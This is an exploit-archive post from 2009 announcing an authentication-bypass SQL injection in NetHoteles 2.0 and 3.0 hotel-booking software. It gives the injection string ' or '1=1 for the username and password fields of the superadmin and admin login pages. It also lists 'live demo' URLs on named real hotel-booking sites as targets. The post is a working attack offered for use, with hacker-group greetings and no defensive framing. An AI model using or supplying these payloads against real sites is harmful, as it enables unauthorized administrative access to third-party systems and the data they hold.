[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-04-16
# Author : Dns-Team
# Previous Title : Geeklog <= 1.5.2 savepreferences()/*blocks[] SQL Injection Exploit
# Next Title : Online Password Manager 4.1 Insecure Cookie Handling Vulnerability
#############################################################################
# #
# NetHoteles v3.0 (Auth Bypass) Remote Sql Injecion #
# #
#############################################################################
#############################################################################
[~] -=[Dns-Team Marocain Hackers]=-
[~] Author: Dns-Team
[~] Contact: Q2[at]HoTmail[dot]Fr
[~] Site: www.Scam4u.com + www.Dns-Team.com
[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ + N@bilX
#############################################################################
---+-- Star --+---
[~] Expl0!T -1- For SuperAdmin :
http://site.ir/superadmin
username: ' or '1=1
Password: ' or '1=1
[~] L1v?¨ D??m0 :
http://internationalhotelbooking.com/demo/superadmin/
#############################################################################
[~] Expl0!T -2- For Admin :
http://site.ir/admin
username: ' or '1=1
Password: ' or '1=1
[~] L1v?¨ D??m0 :
http://internationalhotelbooking.com/demo/admin/
----------------------------------------------
---+-- End --+---
--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+
#############################################################################
#############################################################################
# #
# NetHoteles v2.0 (Auth Bypass) Remote Sql Injecion #
# #
#############################################################################
#############################################################################
[~] -=[Dns-Team Marocain Hackers]=-
[~] Author: Dns-Team
[~] Contact: Q2[at]HoTmail[dot]Fr
[~] Site: www.Scam4u.com + www.Dns-Team.com
[~] Greetz: M4n1x + Sa4d + HSMX + Stack + PR0H4CK3RZ + N@bilX
#############################################################################
---+-- Star --+---
[~] Expl0!T -1- For SuperAdmin :
http://site.ir/superadmin
username: ' or '1=1
Password: ' or '1=1
[~] L1v?¨ D??m0 :
http://www.sierracazorla.com/nethoteles/superadmin/
#############################################################################
[~] Expl0!T -2- For Admin :
http://site.ir/admin
username: ' or '1=1
Password: ' or '1=1
[~] L1v?¨ D??m0 :
http://www.sierracazorla.com/nethoteles/admin/
----------------------------------------------
---+-- End --+---
--+--> :( 4nT! Ch4T + 4nT! Girls :)<--+--
+--------:) Spam-=-Money | Hacker-+-Sport (:--------+
#############################################################################
# www.Syue.com [2009-04-16]